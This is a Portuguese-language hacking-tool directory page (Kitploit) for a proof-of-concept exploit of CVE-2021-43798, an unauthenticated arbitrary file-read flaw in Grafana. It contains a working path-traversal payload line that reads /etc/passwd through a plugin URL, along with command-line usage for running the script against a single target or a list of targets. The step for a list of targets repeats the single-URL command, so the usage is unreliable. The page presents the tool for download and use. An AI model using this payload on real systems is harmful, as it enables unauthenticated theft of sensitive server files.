Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-43798-grafana_fileread — POC da vulnerabilidade de leitura arbitrária de arquivos CVE-2021-43798 do Grafana, utilizando o método de detecção de polling de múltiplos plugins, permite especificar uma única URL e ler URLs a partir de um arquivo. | Kitploit
Ferramentas/GitHubGitHub/moch3n/cve-2021-43798-grafana_fileread
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubmoch3n/cve-2021-43798-grafana_fileread

CVE-2021-43798-grafana_fileread

POC da vulnerabilidade de leitura arbitrária de arquivos CVE-2021-43798 do Grafana, utilizando o método de detecção de polling de múltiplos plugins, permite especificar uma única URL e ler URLs a partir de um arquivo.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
171há 4 anosAinda não revisado

CVE-2021-43798-grafana_fileread

Se o objeto estiver atrás de um proxy reverso, o payload pode ser substituído por este

root@kitploit:~
url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"

Grafana é uma plataforma de aplicação web de visualização de dados de código aberto e multiplataforma. Depois que o usuário configura a conexão com a fonte de dados, o Grafana pode exibir gráficos de dados e alertas no navegador da web.
O Grafana possui uma vulnerabilidade de leitura arbitrária de arquivos não autenticada. Um atacante, sem autenticação, pode ler arquivos arbitrários no host através desta vulnerabilidade.

CVE: CVE-2021-43798
Componente: Grafana Tipo de vulnerabilidade: Leitura de arquivos
Impacto: Obtenção de informações sensíveis
Resumo: Um atacante não autenticado pode explorar esta vulnerabilidade para obter arquivos sensíveis do servidor

Instruções de uso

  1. Testar uma única URL
root@kitploit:~
python3 grafana_fileread.py -u http://localhost:3000

image Os dados obtidos podem ser visualizados no arquivo grafana 8.x_fileread_vuln.txt image 2. Testar IPs de um arquivo

root@kitploit:~
python3 grafana_fileread.py -u http://localhost:3000

image

  1. -h para ajuda image
Baixar ferramenta